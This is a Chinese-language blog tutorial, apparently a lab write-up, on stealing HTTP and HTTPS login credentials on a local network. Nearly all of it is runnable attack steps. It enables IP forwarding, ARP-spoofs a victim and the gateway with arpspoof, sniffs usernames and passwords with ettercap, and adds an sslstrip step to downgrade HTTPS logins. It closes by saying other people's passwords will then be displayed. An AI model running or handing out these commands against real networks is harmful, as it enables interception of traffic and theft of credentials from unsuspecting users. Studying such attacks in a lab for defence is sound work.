局域网内的HTTP/HTTPS账号密码获取 实验

实验工具:

                kali  linux

                arpspoof    >   欺骗

                ettercap     >   欺骗   DNS欺骗  流量嗅探

实验环境:

           攻击机:kali

               ip地址:172.27.13.31

           受害机:w10

               ip地址:172.27.13.12

               网关:172.27.13.254

第一步:

              开启ip转发

              echo 1 >/proc/sys/net/ipv4/ip_forward

第二步:

             用cat命令查看是否已执行成功

             cat   /proc/sys/net/ipv4/ip_forward

             显示为1,表示命令执行成功

第三步:

             开始欺骗

             arpspoof  -i  eth0  -t  172.27.13.12  172.27.13.254    (-i:后面跟攻击机网卡   -t:后面跟受害机的ip和网关)

局域网内的HTTP/HTTPS账号密码获取 实验_第1张图片

第四步:

              新建一个终端,用ettercap命令截取对方输入的账号密码

              ettercap  -Tq  -i  eth0   (-T:启动文本模式  q:安静模式     -i:攻击机网卡)

局域网内的HTTP/HTTPS账号密码获取 实验_第2张图片

这时候只要受害机 在用http协议的网站输入账号密码的时候,就能截取到账号密码等一系列信息

局域网内的HTTP/HTTPS账号密码获取 实验_第3张图片

这里用自己的机子做了个实验  上面的  user  就是账号,pass 就是密码。(实验成功)

在这里注意下,因为有的网站用户名可以用中文汉字,到时截取下来的user类似于   %E7%88%E6  这样的,就需要自己手动去URL解码下了。

 

以上是http协议网站账号密码的获取方法,https协议网站的账号密码获取方式与其相似,只不过中间加了一个步骤。

1.开启转发+欺骗

局域网内的HTTP/HTTPS账号密码获取 实验_第4张图片

2.设置    vim  /etc/ettercap/etter.conf    去掉linux下的俩个注释

   开启   sslstrip   -a  -f  -k  

局域网内的HTTP/HTTPS账号密码获取 实验_第5张图片

局域网内的HTTP/HTTPS账号密码获取 实验_第6张图片

3.用 ettercap  进行抓包  

   ettercap  -Tq  - i  eth0

  

到时候别人登录https协议的网站的时候账号密码都会在上面显示的了

你可能感兴趣的:(web)